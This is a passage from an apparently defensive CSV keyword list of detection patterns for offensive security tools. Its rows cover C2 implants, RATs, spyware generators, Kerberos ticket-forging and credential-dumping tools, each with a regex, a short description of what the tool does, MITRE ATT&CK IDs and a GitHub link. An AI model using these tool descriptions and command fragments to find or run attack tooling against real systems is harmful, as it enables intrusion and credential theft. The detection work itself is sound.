Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*ThreatCheck.exe*",".{0,1000}ThreatCheck\.exe.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*ThreatCheck-master*",".{0,1000}ThreatCheck\-master.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*threatexpress*",".{0,1000}threatexpress.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting post exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/threatexpress","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*threatexpress*malleable*",".{0,1000}threatexpress.{0,1000}malleable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*threatexpress/cs2modrewrite*",".{0,1000}threatexpress\/cs2modrewrite.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*Throwback\Base64_RC4.h*",".{0,1000}Throwback\\Base64_RC4\.h.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*throwback_x64.exe*",".{0,1000}throwback_x64\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*throwback_x86.exe*",".{0,1000}throwback_x86\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*throwBackDev.exe*",".{0,1000}throwBackDev\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*ThrowbackDLL.cpp*",".{0,1000}ThrowbackDLL\.cpp.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*ThrowbackDLL.exe*",".{0,1000}ThrowbackDLL\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*ThrowbackDLL.vcxproj*",".{0,1000}ThrowbackDLL\.vcxproj.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*ThunderDNS*.php*",".{0,1000}ThunderDNS.{0,1000}\.php.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","404","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderDNS*.ps1*",".{0,1000}ThunderDNS.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","404","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderDNS*.py*",".{0,1000}ThunderDNS.{0,1000}\.py.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","404","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderDNS.git*",".{0,1000}ThunderDNS\.git.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","404","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderFox.exe*",".{0,1000}ThunderFox\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ThunderShell*",".{0,1000}ThunderShell.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ThunderShell.git*",".{0,1000}ThunderShell\.git.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ThunderShell.py*",".{0,1000}ThunderShell\.py.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ThunderShell-master.zip*",".{0,1000}ThunderShell\-master\.zip.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*thycotic_secretserver_dump.*",".{0,1000}thycotic_secretserver_dump\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*tiagorlampert*",".{0,1000}tiagorlampert.{0,1000}","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/tiagorlampert","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tiagorlampert/CHAOS*",".{0,1000}tiagorlampert\/CHAOS.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*tiagorlampert/chaos:latest*",".{0,1000}tiagorlampert\/chaos\:latest.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*tiagorlampert/sAINT*",".{0,1000}tiagorlampert\/sAINT.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*tiagorlampert@gmail.com*",".{0,1000}tiagorlampert\@gmail\.com.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*Tib3rius/AutoRecon*",".{0,1000}Tib3rius\/AutoRecon.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*ticket.kirbi*",".{0,1000}ticket\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ticket.kirbi*",".{0,1000}ticket\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*ticketConverter.py *.ccache *",".{0,1000}ticketConverter\.py\s.{0,1000}\.ccache\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*ticketConverter.py*",".{0,1000}ticketConverter\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ticketer.py -nthash *",".{0,1000}ticketer\.py\s\-nthash\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*ticketer.py -nthash *",".{0,1000}ticketer\.py\s\-nthash\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*ticketer.py -nthash*",".{0,1000}ticketer\.py\s\-nthash.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ticketer.py*",".{0,1000}ticketer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ticketsplease adfs *",".{0,1000}ticketsplease\sadfs\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease azure *",".{0,1000}ticketsplease\sazure\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease dcsync *",".{0,1000}ticketsplease\sdcsync\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease ldap *",".{0,1000}ticketsplease\sldap\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease saml *",".{0,1000}ticketsplease\ssaml\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease ticket --domain*",".{0,1000}ticketsplease\sticket\s\-\-domain.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease.modules.*",".{0,1000}ticketsplease\.modules\..{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*TicketToHashcat.py*",".{0,1000}TicketToHashcat\.py.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*TicketToHashcat.py*",".{0,1000}TicketToHashcat\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*Tiger-192.test-vectors.txt*",".{0,1000}Tiger\-192\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*tijme/kernel-mii*",".{0,1000}tijme\/kernel\-mii.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*TikiLoader*Hollower*",".{0,1000}TikiLoader.{0,1000}Hollower.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiLoader.*",".{0,1000}TikiLoader\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiLoader.*",".{0,1000}TikiLoader\..{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 